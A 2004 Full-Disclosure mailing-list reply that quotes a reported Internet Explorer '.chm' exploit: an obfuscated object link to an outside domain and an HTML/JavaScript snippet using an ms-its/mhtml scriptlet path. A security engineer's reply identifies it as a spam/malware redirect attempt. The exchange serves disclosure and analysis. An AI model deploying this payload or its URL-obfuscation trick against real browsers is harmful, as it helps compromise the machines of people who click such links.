On Wed, 25 Aug 2004 13:50:04 -0700, morning_wood <[EMAIL PROTECTED]> wrote: > ><object data="http://www.v%69k%6F%72d.com/default.htm";><br><br> > > this is a data tag .chm exploit > > [textarea id="code" style="display:none;"] > [object > data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm:: > /default.htm" type="text/x-scriptlet"][/object] > [/textarea] > > [script language="javascript"] > > document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca > tion.href.indexOf('default.htm')))); > [/script] > > m.wood > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Yeah, looks like a blended spam/malware/IE Redirect type exploit attempt. If the recipient is dumb enough to click on the link they've just opened themselves to something "interesting". ;) -- Charlie Heselton Network Security Engineer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
